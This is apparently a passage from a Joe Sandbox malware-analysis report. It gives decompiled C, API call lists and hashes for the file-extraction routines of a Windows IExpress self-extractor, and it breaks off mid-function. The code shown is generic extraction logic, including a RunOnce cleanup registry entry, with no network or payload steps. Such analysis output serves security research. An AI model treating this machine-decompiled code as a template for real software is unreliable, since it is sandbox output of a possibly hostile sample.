                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: CloseDeleteOpenValue
                              • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                              • API String ID: 849931509-1592051331
                              • Opcode ID: bc096c7ed1b343bc4498c84f9b5df44b91d8536546963b58a3c836622fad1379
                              • Instruction ID: ad019cae8f3df2081ae960c95c0ac254182e31a328bcf3662f50d459d8aa1edb
                              • Opcode Fuzzy Hash: bc096c7ed1b343bc4498c84f9b5df44b91d8536546963b58a3c836622fad1379
                              • Instruction Fuzzy Hash: 22E04F34690318BBDB21CBD0EC0EF5E7B6DF750745F10C598B90DA0060EB655E96D715
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E00A74CD0(char* __edx, long _a4, int _a8) {
                              				signed int _v8;
                              				char _v268;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t29;
                              				int _t30;
                              				long _t32;
                              				signed int _t33;
                              				long _t35;
                              				long _t36;
                              				struct HWND__* _t37;
                              				long _t38;
                              				long _t39;
                              				long _t41;
                              				long _t44;
                              				long _t45;
                              				long _t46;
                              				signed int _t50;
                              				long _t51;
                              				char* _t58;
                              				long _t59;
                              				char* _t63;
                              				long _t64;
                              				CHAR* _t71;
                              				CHAR* _t74;
                              				int _t75;
                              				signed int _t76;
                              
                              				_t69 = __edx;
                              				_t29 =  *0xa78004; // 0x74742267
                              				_t30 = _t29 ^ _t76;
                              				_v8 = _t30;
                              				_t75 = _a8;
                              				if( *0xa791d8 == 0) {
                              					_t32 = _a4;
                              					__eflags = _t32;
                              					if(_t32 == 0) {
                              						_t33 = E00A74E99(_t75);
                              						L35:
                              						return E00A76CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                              					}
                              					_t35 = _t32 - 1;
                              					__eflags = _t35;
                              					if(_t35 == 0) {
                              						L9:
                              						_t33 = 0;
                              						goto L35;
                              					}
                              					_t36 = _t35 - 1;
                              					__eflags = _t36;
                              					if(_t36 == 0) {
                              						_t37 =  *0xa78584; // 0x0
                              						__eflags = _t37;
                              						if(_t37 != 0) {
                              							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                              						}
                              						_t54 = 0xa791e4;
                              						_t58 = 0xa791e4;
                              						do {
                              							_t38 =  *_t58;
                              							_t58 =  &(_t58[1]);
                              							__eflags = _t38;
                              						} while (_t38 != 0);
                              						_t59 = _t58 - 0xa791e5;
                              						__eflags = _t59;
                              						_t71 =  *(_t75 + 4);
                              						_t73 =  &(_t71[1]);
                              						do {
                              							_t39 =  *_t71;
                              							_t71 =  &(_t71[1]);
                              							__eflags = _t39;
                              						} while (_t39 != 0);
                              						_t69 = _t71 - _t73;
                              						_t30 = _t59 + 1 + _t71 - _t73;
                              						__eflags = _t30 - 0x104;
                              						if(_t30 >= 0x104) {
                              							L3:
                              							_t33 = _t30 | 0xffffffff;
                              							goto L35;
                              						}
                              						_t69 = 0xa791e4;
                              						_t30 = E00A74702( &_v268, 0xa791e4,  *(_t75 + 4));
                              						__eflags = _t30;
                              						if(__eflags == 0) {
                              							goto L3;
                              						}
                              						_t41 = E00A7476D( &_v268, __eflags);
                              						__eflags = _t41;
                              						if(_t41 == 0) {
                              							goto L9;
                              						}
                              						_push(0x180);
                              						_t30 = E00A74980( &_v268, 0x8302); // executed
                              						_t75 = _t30;
                              						__eflags = _t75 - 0xffffffff;
                              						if(_t75 == 0xffffffff) {
                              							goto L3;
                              						}
                              						_t30 = E00A747E0( &_v268);
                              						__eflags = _t30;
                              						if(_t30 == 0) {
                              							goto L3;
                              						}
                              						 *0xa793f4 =  *0xa793f4 + 1;
                              						_t33 = _t75;
                              						goto L35;
                              					}
                              					_t44 = _t36 - 1;
                              					__eflags = _t44;
                              					if(_t44 == 0) {
                              						_t54 = 0xa791e4;
                              						_t63 = 0xa791e4;
                              						do {
                              							_t45 =  *_t63;
                              							_t63 =  &(_t63[1]);
                              							__eflags = _t45;
                              						} while (_t45 != 0);
                              						_t74 =  *(_t75 + 4);
                              						_t64 = _t63 - 0xa791e5;
                              						__eflags = _t64;
                              						_t69 =  &(_t74[1]);
                              						do {
                              							_t46 =  *_t74;
                              							_t74 =  &(_t74[1]);
                              							__eflags = _t46;
                              						} while (_t46 != 0);
                              						_t73 = _t74 - _t69;
                              						_t30 = _t64 + 1 + _t74 - _t69;
                              						__eflags = _t30 - 0x104;
                              						if(_t30 >= 0x104) {
                              							goto L3;
                              						}
                              						_t69 = 0xa791e4;
                              						_t30 = E00A74702( &_v268, 0xa791e4,  *(_t75 + 4));
                              						__eflags = _t30;
                              						if(_t30 == 0) {
                              							goto L3;
                              						}
                              						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                              						_t30 = E00A74C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                              						__eflags = _t30;
                              						if(_t30 == 0) {
                              							goto L3;
                              						}
                              						E00A74B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                              						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                              						__eflags = _t50;
                              						if(_t50 != 0) {
                              							_t51 = _t50 & 0x00000027;
                              							__eflags = _t51;
                              						} else {
                              							_t51 = 0x80;
                              						}
                              						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                              						__eflags = _t30;
                              						if(_t30 == 0) {
                              							goto L3;
                              						} else {
                              							_t33 = 1;
                              							goto L35;
                              						}
                              					}
                              					_t30 = _t44 - 1;
                              					__eflags = _t30;
                              					if(_t30 == 0) {
                              						goto L3;
                              					}
                              					goto L9;
                              				}
                              				if(_a4 == 3) {
                              					_t30 = E00A74B60( *((intOrPtr*)(_t75 + 0x14)));
                              				}
                              				goto L3;
                              			}
































                              APIs
                              • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00A74DB5
                              • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00A74DDD
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: AttributesFileItemText
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                              • API String ID: 3625706803-3647970563
                              • Opcode ID: ec20caba132b445cb0a3f633125b3ccffecb377d1ba0606f0557a447fdc594ac
                              • Instruction ID: f0a330b98edf0a97a4cb7b14abf8889ded796fc02c61c5fa2c046e4397ae6727
                              • Opcode Fuzzy Hash: ec20caba132b445cb0a3f633125b3ccffecb377d1ba0606f0557a447fdc594ac
                              • Instruction Fuzzy Hash: BA4126362002019BCB359F38DE546FA77A9EB4D310F04C669E8CE97296DB71DE8AC750
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A74C37(signed int __ecx, int __edx, int _a4) {
                              				struct _FILETIME _v12;
                              				struct _FILETIME _v20;
                              				FILETIME* _t14;
                              				int _t15;
                              				signed int _t21;
                              
                              				_t21 = __ecx * 0x18;
                              				if( *((intOrPtr*)(_t21 + 0xa78d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                              					L5:
                              					return 0;
                              				} else {
                              					_t14 =  &_v12;
                              					_t15 = SetFileTime( *(_t21 + 0xa78d74), _t14, _t14, _t14); // executed
                              					if(_t15 == 0) {
                              						goto L5;
                              					}
                              					return 1;
                              				}
                              			}









                              APIs
                              • DosDateTimeToFileTime.KERNEL32 ref: 00A74C54
                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A74C66
                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A74C7E
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Time$File$DateLocal
                              • String ID:
                              • API String ID: 2071732420-0
                              • Opcode ID: ba4f7567d0ea6de4d0454b9d1f9082e32d6a42c34af33b16be2b3bff8b18381e
                              • Instruction ID: c5d979bb94cf1ed4423e7304197837f293a22ad486c0648430fa702d5760094b
                              • Opcode Fuzzy Hash: ba4f7567d0ea6de4d0454b9d1f9082e32d6a42c34af33b16be2b3bff8b18381e
                              • Instruction Fuzzy Hash: 4FF0907270120CBFAB65DFB4CC48DBB77ACEB58340B44C52AA82DC1050EB30D954C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E00A7487A(CHAR* __ecx, signed int __edx) {
                              				void* _t7;
                              				CHAR* _t11;
                              				long _t18;
                              				long _t23;
                              
                              				_t11 = __ecx;
                              				asm("sbb edi, edi");
                              				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                              				if((__edx & 0x00000100) == 0) {
                              					asm("sbb esi, esi");
                              					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                              				} else {
                              					if((__edx & 0x00000400) == 0) {
                              						asm("sbb esi, esi");
                              						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                              					} else {
                              						_t23 = 1;
                              					}
                              				}
                              				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                              				if(_t7 != 0xffffffff || _t23 == 3) {
                              					return _t7;
                              				} else {
                              					E00A7490C(_t11);
                              					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                              				}
                              			}








                              APIs
                              • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00A74A23,?,00A74F67,*MEMCAB,00008000,00000180), ref: 00A748DE
                              • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00A74F67,*MEMCAB,00008000,00000180), ref: 00A74902
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: ed28127584b1ed42ce907f784ded4d309dbad96f70894fe9b2a525c22f13a7a3
                              • Instruction ID: f8e8d5faf9255a9f22cb5a69091e8ad8b1d8ae5c5b664ea7d93d8da85b8f6f5e
                              • Opcode Fuzzy Hash: ed28127584b1ed42ce907f784ded4d309dbad96f70894fe9b2a525c22f13a7a3
                              • Instruction Fuzzy Hash: 80014BA3E1157426F32481694C88FB7555CCBDA735F1B8335BEAEE71D1D6644C0481E1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E00A74AD0(signed int _a4, void* _a8, long _a12) {
                              				signed int _t9;
                              				int _t12;
                              				signed int _t14;
                              				signed int _t15;
                              				void* _t20;
                              				struct HWND__* _t21;
                              				signed int _t24;
                              				signed int _t25;
                              
                              				_t20 =  *0xa7858c; // 0x268
                              				_t9 = E00A73680(_t20);
                              				if( *0xa791d8 == 0) {
                              					_push(_t24);
                              					_t12 = WriteFile( *(0xa78d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                              					if(_t12 != 0) {
                              						_t25 = _a12;
                              						if(_t25 != 0xffffffff) {
                              							_t14 =  *0xa79400; // 0x5d600
                              							_t15 = _t14 + _t25;
                              							 *0xa79400 = _t15;
                              							if( *0xa78184 != 0) {
                              								_t21 =  *0xa78584; // 0x0
                              								if(_t21 != 0) {
                              									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xa793f8, 0);
                              								}
                              							}
                              						}
                              					} else {
                              						_t25 = _t24 | 0xffffffff;
                              					}
                              					return _t25;
                              				} else {
                              					return _t9 | 0xffffffff;
                              				}
                              			}












                              APIs
                                • Part of subcall function 00A73680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A7369F
                                • Part of subcall function 00A73680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A736B2
                                • Part of subcall function 00A73680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A736DA
                              • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00A74B05
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                              • String ID:
                              • API String ID: 1084409-0
                              • Opcode ID: bd8be67854731608c0e78bfd8a09f2189f31491319429e1a312bd8d7387ae57f
                              • Instruction ID: 17bf76f5eadb2a884b5b757057ae0623a9fcfed9475e80c67154561d3b95f56c
                              • Opcode Fuzzy Hash: bd8be67854731608c0e78bfd8a09f2189f31491319429e1a312bd8d7387ae57f
                              • Instruction Fuzzy Hash: 1C014031340205ABDB14CF98DC09BA6B769E788725F14C225F93D971E1CB70DC92CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A7658A(char* __ecx, void* __edx, char* _a4) {
                              				intOrPtr _t4;
                              				char* _t6;
                              				char* _t8;
                              				void* _t10;
                              				void* _t12;
                              				char* _t16;
                              				intOrPtr* _t17;
                              				void* _t18;
                              				char* _t19;
                              
                              				_t16 = __ecx;
                              				_t10 = __edx;
                              				_t17 = __ecx;
                              				_t1 = _t17 + 1; // 0xa78b3f
                              				_t12 = _t1;
                              				do {
                              					_t4 =  *_t17;
                              					_t17 = _t17 + 1;
                              				} while (_t4 != 0);
                              				_t18 = _t17 - _t12;
                              				_t2 = _t18 + 1; // 0xa78b40
                              				if(_t2 < __edx) {
                              					_t19 = _t18 + __ecx;
                              					if(_t19 > __ecx) {
                              						_t8 = CharPrevA(__ecx, _t19); // executed
                              						if( *_t8 != 0x5c) {
                              							 *_t19 = 0x5c;
                              							_t19 =  &(_t19[1]);
                              						}
                              					}
                              					_t6 = _a4;
                              					 *_t19 = 0;
                              					while( *_t6 == 0x20) {
                              						_t6 = _t6 + 1;
                              					}
                              					return E00A716B3(_t16, _t10, _t6);
                              				}
                              				return 0x8007007a;
                              			}













                              APIs
                              • CharPrevA.USER32(00A78B3E,00A78B3F,00000001,00A78B3E,-00000003,?,00A760EC,00A71140,?), ref: 00A765BA
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: CharPrev
                              • String ID:
                              • API String ID: 122130370-0
                              • Opcode ID: 99d15d7dd2cda0125ad405cb54728ad63963f418fb58c05534599bd18e0841f9
                              • Instruction ID: 52a9c574dfb30ac1ac45ac093b18f9cd308b3aac4adde83bf9a93803f3918cd1
                              • Opcode Fuzzy Hash: 99d15d7dd2cda0125ad405cb54728ad63963f418fb58c05534599bd18e0841f9
                              • Instruction Fuzzy Hash: 59F04C331046509BD3324A1D9CC4B66BFDE9BC6350F28C16EE8DEC3205DA658C46A3A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E00A7621E() {
                              				signed int _v8;
                              				char _v268;
                              				signed int _t5;
                              				void* _t9;
                              				void* _t13;
                              				void* _t19;
                              				void* _t20;
                              				signed int _t21;
                              
                              				_t5 =  *0xa78004; // 0x74742267
                              				_v8 = _t5 ^ _t21;
                              				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                              					0x4f0 = 2;
                              					_t9 = E00A7597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                              				} else {
                              					E00A744B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                              					 *0xa79124 = E00A76285();
                              					_t9 = 0;
                              				}
                              				return E00A76CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                              			}












                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A7623F
                                • Part of subcall function 00A744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A74518
                                • Part of subcall function 00A744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A74554
                                • Part of subcall function 00A76285: GetLastError.KERNEL32(00A75BBC), ref: 00A76285
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: DirectoryErrorLastLoadMessageStringWindows
                              • String ID:
                              • API String ID: 381621628-0
                              • Opcode ID: 13379f334d2022d16fe1074e0215ccd186dd7f6bb56d39e4b1630d1d9f7065e8
                              • Instruction ID: 60b0b6ac39b6e3439cd94bc64d9dba5f3f9bc993cf04d986e3926b6cb38dc2ae
                              • Opcode Fuzzy Hash: 13379f334d2022d16fe1074e0215ccd186dd7f6bb56d39e4b1630d1d9f7065e8
                              • Instruction Fuzzy Hash: 79F0E9B0B00208ABE790EB748E06FFE33BCDB54300F40C46AB98ED6082DE749D858690
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A74B60(signed int _a4) {
                              				signed int _t9;
                              				signed int _t15;
                              
                              				_t15 = _a4 * 0x18;
                              				if( *((intOrPtr*)(_t15 + 0xa78d64)) != 1) {
                              					_t9 = FindCloseChangeNotification( *(_t15 + 0xa78d74)); // executed
                              					if(_t9 == 0) {
                              						return _t9 | 0xffffffff;
                              					}
                              					 *((intOrPtr*)(_t15 + 0xa78d60)) = 1;
                              					return 0;
                              				}
                              				 *((intOrPtr*)(_t15 + 0xa78d60)) = 1;
                              				 *((intOrPtr*)(_t15 + 0xa78d68)) = 0;
                              				 *((intOrPtr*)(_t15 + 0xa78d70)) = 0;
                              				 *((intOrPtr*)(_t15 + 0xa78d6c)) = 0;
                              				return 0;
                              			}






                              APIs
                              • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00A74FA1,00000000), ref: 00A74B98
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: ChangeCloseFindNotification
                              • String ID:
                              • API String ID: 2591292051-0
                              • Opcode ID: 0631bee14517897260ab794f2a9b282cc97fc750ca87f04c9dfccb987ce13a36
                              • Instruction ID: c6ca6de70d0f2211681af4499060e2bf23cad70f64e4dc4f3a0d2df049eb2228
                              • Opcode Fuzzy Hash: 0631bee14517897260ab794f2a9b282cc97fc750ca87f04c9dfccb987ce13a36
                              • Instruction Fuzzy Hash: E7F01231780B089E5B71CF39CC18653BBE4AAE53A1710C92F946ED2192DB34AC41CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A766AE(CHAR* __ecx) {
                              				unsigned int _t1;
                              
                              				_t1 = GetFileAttributesA(__ecx); // executed
                              				if(_t1 != 0xffffffff) {
                              					return  !(_t1 >> 4) & 0x00000001;
                              				} else {
                              					return 0;
                              				}
                              			}





                              APIs
                              • GetFileAttributesA.KERNELBASE(?,00A74777,?,00A74E38,?), ref: 00A766B1
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 2a4e68972e04b06452d8f174e2b3d1418be173ac5cbaf752e6d233eaa71522f4
                              • Instruction ID: a74105462a9022a37a9a069fd6a47131a681c7d4c884d5cb9a002b3217bd30c1
                              • Opcode Fuzzy Hash: 2a4e68972e04b06452d8f174e2b3d1418be173ac5cbaf752e6d233eaa71522f4
                              • Instruction Fuzzy Hash: 3AB09276222840526E2447716C2965A2A41B6D123A7E89B90F03AC01E0CA3EC887D004
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A74CA0(long _a4) {
                              				void* _t2;
                              
                              				_t2 = GlobalAlloc(0, _a4); // executed
                              				return _t2;
                              			}




                              0x00a74caa
                              0x00a74cb1

                              APIs
                              • GlobalAlloc.KERNELBASE(00000000,?), ref: 00A74CAA
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: AllocGlobal
                              • String ID:
                              • API String ID: 3761449716-0
                              • Opcode ID: 1d52b21ac84735ad1fdf708ecf8eaadcebb177f9bdb92d6eefcb6e44f960f8cc
                              • Instruction ID: 7aca0c8ec57748e0acd9aa1177179f113af3884b96bb8998aeed9f0c242a7811
                              • Opcode Fuzzy Hash: 1d52b21ac84735ad1fdf708ecf8eaadcebb177f9bdb92d6eefcb6e44f960f8cc
                              • Instruction Fuzzy Hash: 03B0123214420CB7CF001FC2EC09F893F5DF7C4761F144000F60C454508A7294528696
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A74CC0(void* _a4) {
                              				void* _t2;
                              
                              				_t2 = GlobalFree(_a4); // executed
                              				return _t2;
                              			}




                              0x00a74cc8
                              0x00a74ccf

                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: FreeGlobal
                              • String ID:
                              • API String ID: 2979337801-0
                              • Opcode ID: 1a86cd3589cd93edbbeaf32e83474d6c81b118a074b636502b51b916fbdbfb95
                              • Instruction ID: 5afc0293dc78e0d406de99696e558bf54265135bc59ddeb1fed96efa7f208220
                              • Opcode Fuzzy Hash: 1a86cd3589cd93edbbeaf32e83474d6c81b118a074b636502b51b916fbdbfb95
                              • Instruction Fuzzy Hash: 15B0123100010CBB8F001B82EC088493F1DD6C02607004010F50C414218B3398538585
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 92%
                              			E00A75C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                              				signed int _v8;
                              				signed int _v12;
                              				CHAR* _v265;
                              				char _v266;
                              				char _v267;
                              				char _v268;
                              				CHAR* _v272;
                              				char _v276;
                              				signed int _v296;
                              				char _v556;
                              				signed int _t61;
                              				int _t63;
                              				char _t67;
                              				CHAR* _t69;
                              				signed int _t71;
                              				void* _t75;
                              				char _t79;
                              				void* _t83;
                              				void* _t85;
                              				void* _t87;
                              				intOrPtr _t88;
                              				void* _t100;
                              				intOrPtr _t101;
                              				CHAR* _t104;
                              				intOrPtr _t105;
                              				void* _t111;
                              				void* _t115;
                              				CHAR* _t118;
                              				void* _t119;
                              				void* _t127;
                              				CHAR* _t129;
                              				void* _t132;
                              				void* _t142;
                              				signed int _t143;
                              				CHAR* _t144;
                              				void* _t145;
                              				void* _t146;
                              				void* _t147;
                              				void* _t149;
                              				char _t155;
                              				void* _t157;
                              				void* _t162;
                              				void* _t163;
                              				char _t167;
                              				char _t170;
                              				CHAR* _t173;
                              				void* _t177;
                              				intOrPtr* _t183;
                              				intOrPtr* _t192;
                              				CHAR* _t199;
                              				void* _t200;
                              				CHAR* _t201;
                              				void* _t205;
                              				void* _t206;
                              				int _t209;
                              				void* _t210;
                              				void* _t212;
                              				void* _t213;
                              				CHAR* _t218;
                              				intOrPtr* _t219;
                              				intOrPtr* _t220;
                              				signed int _t221;
                              				signed int _t223;
                              
                              				_t173 = __ecx;
                              				_t61 =  *0xa78004; // 0x74742267
                              				_v8 = _t61 ^ _t221;
                              				_push(__ebx);
                              				_push(__esi);
                              				_push(__edi);
                              				_t209 = 1;
                              				if(__ecx == 0 ||  *__ecx == 0) {
                              					_t63 = 1;
                              				} else {
                              					L2:
                              					while(_t209 != 0) {
                              						_t67 =  *_t173;
                              						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                              							_t173 = CharNextA(_t173);
                              							continue;
                              						}
                              						_v272 = _t173;
                              						if(_t67 == 0) {
                              							break;
                              						} else {
                              							_t69 = _v272;
                              							_t177 = 0;
                              							_t213 = 0;
                              							_t163 = 0;
                              							_t202 = 1;
                              							do {
                              								if(_t213 != 0) {
                              									if(_t163 != 0) {
                              										break;
